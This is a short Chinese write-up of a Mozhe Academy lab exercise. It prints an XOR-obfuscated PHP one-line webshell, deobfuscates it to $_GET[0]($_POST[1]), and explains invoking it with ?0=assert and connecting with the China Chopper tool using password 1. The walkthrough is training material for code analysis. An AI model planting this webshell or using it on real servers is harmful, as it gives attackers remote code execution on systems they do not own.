墨者学院-PHP代码分析溯源(第1题)
2019-07-02 本文已影响0人
nohands_noob
靶场地址:
https://www.mozhe.cn/bug/detail/UW5xcFhsWE05akxJYjB1TzEyM2p3UT09bW96aGUmozhe
进入靶场,标题是b.php源码
然后映入眼帘的是一串看不懂的字符
b.php源码
<?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?>
其实这是一句话木马的变种,整理下
$_
原来的值为0,经过$_++
,变成1
在python中将字符的异或进行计算,解得$__=_GET,$___=_POST
而$_
布尔值为True,!$_
则为False,值为0
整理${$__}[!$_](${$___}[$_]);
得到 $_GET[0]($_POST[1])
,是不是很眼熟,这其实就是一句话木马
提交参数b.php?0=assert,代码就变成了<?php assert($_POST[1]); ?>
因此上菜刀,密码为1,连接: